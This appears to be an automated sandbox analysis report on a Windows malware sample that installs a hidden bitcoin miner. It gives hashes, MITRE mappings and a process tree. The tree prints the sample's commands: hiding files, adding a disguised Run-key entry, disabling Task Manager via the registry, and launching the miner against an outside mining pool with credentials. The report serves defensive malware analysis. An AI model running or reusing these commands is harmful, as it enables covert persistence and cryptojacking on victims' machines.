Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
25/08/2024, 01:43
Static task
static1
Behavioral task
behavioral1
Sample
bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe
-
Size
2.8MB
-
MD5
bfe17800bf5f9d1c0e3e2f548c10441b
-
SHA1
64791f65e1759bd0e4201d5e19e9a50e41ab83fa
-
SHA256
f31b14069833b2ad38b746e4a32639b06fa06024129860da9f3c3c03a732a65e
-
SHA512
35806a40f9929c04cd02fb90db5d503b77b317d40138f76d03f306cfda3bd09615f18d3da5d103a780ad53d0fa4cfd3f351b6e62144d95f379a32a0432e794fa
-
SSDEEP
49152:9j+liOUidT2U0RDWKMRtTgpJQUxCC5AF:
Malware Config
Signatures
-
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" reg.exe -
Disables Task Manager via registry modification
-
Executes dropped EXE 3 IoCs
pid Process 1260 checker.exe 2820 run.exe 752 bitcoin-miner.exe -
Loads dropped DLL 6 IoCs
pid Process 2536 cmd.exe 2536 cmd.exe 2668 cmd.exe 2668 cmd.exe 2324 cmd.exe 2324 cmd.exe -
resource yara_rule behavioral1/memory/2920-13-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/memory/2920-11-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/memory/2920-16-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/memory/2920-15-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/memory/2920-14-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/memory/2920-7-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/memory/2920-6-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/files/0x0007000000016d89-42.dat upx behavioral1/files/0x0007000000016d81-43.dat upx behavioral1/memory/2536-45-0x0000000000130000-0x0000000000140000-memory.dmp upx behavioral1/memory/1260-49-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2920-65-0x0000000000400000-0x0000000000545000-memory.dmp upx behavioral1/memory/2668-69-0x0000000000270000-0x0000000000280000-memory.dmp upx behavioral1/memory/1260-92-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2820-94-0x0000000000400000-0x0000000000410000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\"" bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antivirus = "C:\\Cache\\checker.exe" reg.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1752 tasklist.exe 2188 tasklist.exe 1884 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2708 set thread context of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitcoin-miner.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language run.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language checker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2296 PING.EXE 2388 PING.EXE 1384 PING.EXE 848 PING.EXE -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 2296 PING.EXE 2388 PING.EXE 1384 PING.EXE 848 PING.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2188 tasklist.exe Token: SeDebugPrivilege 1884 tasklist.exe Token: SeDebugPrivilege 1752 tasklist.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2708 wrote to memory of 2920 2708 bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe 30 PID 2920 wrote to memory of 2536 2920 vbc.exe 31 PID 2920 wrote to memory of 2536 2920 vbc.exe 31 PID 2920 wrote to memory of 2536 2920 vbc.exe 31 PID 2920 wrote to memory of 2536 2920 vbc.exe 31 PID 2536 wrote to memory of 2296 2536 cmd.exe 33 PID 2536 wrote to memory of 2296 2536 cmd.exe 33 PID 2536 wrote to memory of 2296 2536 cmd.exe 33 PID 2536 wrote to memory of 2296 2536 cmd.exe 33 PID 2536 wrote to memory of 1228 2536 cmd.exe 34 PID 2536 wrote to memory of 1228 2536 cmd.exe 34 PID 2536 wrote to memory of 1228 2536 cmd.exe 34 PID 2536 wrote to memory of 1228 2536 cmd.exe 34 PID 2536 wrote to memory of 2472 2536 cmd.exe 35 PID 2536 wrote to memory of 2472 2536 cmd.exe 35 PID 2536 wrote to memory of 2472 2536 cmd.exe 35 PID 2536 wrote to memory of 2472 2536 cmd.exe 35 PID 2536 wrote to memory of 1352 2536 cmd.exe 36 PID 2536 wrote to memory of 1352 2536 cmd.exe 36 PID 2536 wrote to memory of 1352 2536 cmd.exe 36 PID 2536 wrote to memory of 1352 2536 cmd.exe 36 PID 2536 wrote to memory of 1116 2536 cmd.exe 37 PID 2536 wrote to memory of 1116 2536 cmd.exe 37 PID 2536 wrote to memory of 1116 2536 cmd.exe 37 PID 2536 wrote to memory of 1116 2536 cmd.exe 37 PID 2536 wrote to memory of 440 2536 cmd.exe 38 PID 2536 wrote to memory of 440 2536 cmd.exe 38 PID 2536 wrote to memory of 440 2536 cmd.exe 38 PID 2536 wrote to memory of 440 2536 cmd.exe 38 PID 2536 wrote to memory of 1488 2536 cmd.exe 39 PID 2536 wrote to memory of 1488 2536 cmd.exe 39 PID 2536 wrote to memory of 1488 2536 cmd.exe 39 PID 2536 wrote to memory of 1488 2536 cmd.exe 39 PID 2536 wrote to memory of 648 2536 cmd.exe 40 PID 2536 wrote to memory of 648 2536 cmd.exe 40 PID 2536 wrote to memory of 648 2536 cmd.exe 40 PID 2536 wrote to memory of 648 2536 cmd.exe 40 PID 2536 wrote to memory of 1260 2536 cmd.exe 41 PID 2536 wrote to memory of 1260 2536 cmd.exe 41 PID 2536 wrote to memory of 1260 2536 cmd.exe 41 PID 2536 wrote to memory of 1260 2536 cmd.exe 41 PID 1260 wrote to memory of 2668 1260 checker.exe 42 PID 1260 wrote to memory of 2668 1260 checker.exe 42 PID 1260 wrote to memory of 2668 1260 checker.exe 42 PID 1260 wrote to memory of 2668 1260 checker.exe 42 PID 2668 wrote to memory of 2188 2668 cmd.exe 44 PID 2668 wrote to memory of 2188 2668 cmd.exe 44 PID 2668 wrote to memory of 2188 2668 cmd.exe 44 PID 2668 wrote to memory of 2188 2668 cmd.exe 44 PID 2668 wrote to memory of 2804 2668 cmd.exe 46 PID 2668 wrote to memory of 2804 2668 cmd.exe 46 PID 2668 wrote to memory of 2804 2668 cmd.exe 46 PID 2668 wrote to memory of 2804 2668 cmd.exe 46 PID 2668 wrote to memory of 2820 2668 cmd.exe 47 PID 2668 wrote to memory of 2820 2668 cmd.exe 47 PID 2668 wrote to memory of 2820 2668 cmd.exe 47 PID 2668 wrote to memory of 2820 2668 cmd.exe 47 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 1116 attrib.exe 1228 attrib.exe 2472 attrib.exe 1352 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bfe17800bf5f9d1c0e3e2f548c10441b_JaffaCakes118.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\561C.tmp\test.bat" "3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\PING.EXEping localhost -n 54⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2296
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Cache\run.exe4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1228
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Cache\bitcoin-miner.exe4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2472
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Cache\checker.exe4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1352
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Cache4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1116
-
-
C:\Windows\SysWOW64\reg.exereg add hkey_current_user\software\microsoft\windows\currentversion\run /v Antivirus /t reg_sz /d "C:\Cache\checker.exe" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:440
-
-
C:\Windows\SysWOW64\reg.exereg add hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f4⤵
- Disables RegEdit via registry modification
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\reg.exereg add hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f4⤵
- System Location Discovery: System Language Discovery
PID:648
-
-
C:\Cache\checker.exechecker.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\6E6C.tmp\checker.bat" "5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\Windows\SysWOW64\find.exeFIND "bitcoin-miner.exe" result.txt6⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
C:\Cache\run.exeC:\Cache\run.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2820 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7427.tmp\run.bat" "7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2324 -
C:\Cache\bitcoin-miner.exebitcoin-miner.exe -a 5 -o http://pool.bitclockers.com:8332 -u s7eez -p kukuku -t 248⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:752
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 606⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2388
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\Windows\SysWOW64\find.exeFIND "bitcoin-miner.exe" result.txt6⤵
- System Location Discovery: System Language Discovery
PID:2460
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 606⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1384
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\SysWOW64\find.exeFIND "bitcoin-miner.exe" result.txt6⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 606⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:848
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53cc95b3eddc329167833433281d3add8
SHA14ddd84630787f7188cbd378c7074031979ed3473
SHA2561dfa36f76ba469bad7844909554dea9a38f08f249d1ab083c141823cdbcbf90c
SHA512dbf01025decf1fce762ff5a54569701dfa7fa3087e3857e3ea5899f8789e26ff8f86dbbff0f927740b9a7173b09aeab778f18ddc8bdeef1e8ff7804b5990b24b
-
Filesize
3KB
MD50c02efca61a7b62e3e45c0a9a3d0b70a
SHA152be63085e3dc72ae52071e6a37a7bcf440d10ca
SHA25655e7b3e01c7b50a6c208da96135f2173107a2949a01a0a093d210d42499e82be
SHA5121cf891cd54b53fc896613fc8a1582924c424856afb9c60367f38914a5e14c5ee6761612a80e6fcd93026185beb262f1804262c88a3dd4d1967ad1f107fd5b483
-
Filesize
3KB
MD5405e9df3234fc3ab6de98b2b1a9c38a0
SHA1821a57effe2817080c2efdc61a97fa092414a8ed
SHA256099150523d202a2da9a9e88afb0915b5a449be941b19ffdfed167f2869dc979c
SHA5127f2191b6582741d59d98d155414eb752a0a101765e6e8dd33c298b79ee30d4e619bd4cb07f4ca21254b64f8a342df935e681dff82c55378adb9fd6794bb19a25
-
Filesize
659B
MD5a159ff64bdd86119d3810c5c467b37c5
SHA15867c5f0e54451b45ef256b1ff6ed48fe7a6941d
SHA2560c71339eea76e2ac439b5e590e009aee64ce086104eb3659b3466213cd4b6328
SHA512a21b3518201652b27e1b0a61f374e339d3dc7482992d25fda94244fe3a9a3896f1bf19f4a64433a57ef2c72787ebcf604714660abfe8b41ad724302b4e445171
-
Filesize
165B
MD559685a7437a42b58e0f15e5305dfe403
SHA1ed7b81ddfe8b904bf1b69a4d07e0f99cbff92ae6
SHA256b7e7c6009e776e3ed1c0bb80da8e14190b034c5bcd6ccee5aec7f68df8beaed2
SHA5126b6a5e91ba342adbecff9ff1d570c0275700f60c348780ca28bd6362896f3a3021c44bc555367cdcb62212277b1898661dec9c3674cbd668826fc1aa91286e3d
-
Filesize
83B
MD5172e76eea3bf6b1690e730de18c237ce
SHA11996dbcf5445d7758c8c32803cfa2184914067e4
SHA2561cec973c8a11df697e35b0fce0006334a4bc6752edd51b908975027e5d353610
SHA512fb0bf2690ec77b884da196d37d34e846e98b51973cdefd2e701febd412b35b8fa4e2d32e92ac8f23ccf4e1f9389373aa3c24aea5c48b0dc7af2c6c82aae66ab9
-
Filesize
672KB
MD55e73d3f4cde7c8c3d8ea87372edf5771
SHA195871d7fe75e3393bf7ea9428aa23f5725ebd895
SHA2567867dd91375e3cb9b1bc1bb1602c3d9c77041d6c04ed66783399f6708192efec
SHA512d783dc2d5b8cf6c49193ea3bd778c4556338748a9a981772eea42ae38fa592d897c539c84671073a81950fddd963d5bb0c1543381b4d2af035997e9d6b41ef5e
-
Filesize
21KB
MD5441deed66676ea3d1b91c76d364965bc
SHA11234f568d5bc3e3b7310487adf55467cebae74d8
SHA2568a4d75e0803c3fb2a3f5e3371754b8fe01d398fd8db8712f03280cc4d27289ea
SHA512ff60d74c23e41f2dbb5ecb21526a1e111d7e160b8083e88f124c8b325238394def49d1f95c90171a485343f51765b3a8879026955bd6f419d0088b7dd439f9e4
-
Filesize
21KB
MD5e36f9411cd577d2c4da6878781844f2c
SHA19a5568008416efe4cb91528a760491019216f386
SHA2568bc058ca7adddc2f1b78ed605ebc218763688dfaf664983b7ed6801120ae98e0
SHA512d52e0b5a2438e9b4f47facecd4e5235ad06d6c46d8812f11b30ae4575ed33e913336107807b3b01cf192507655c5f509391c86159de6b2b573592c2b17706ed0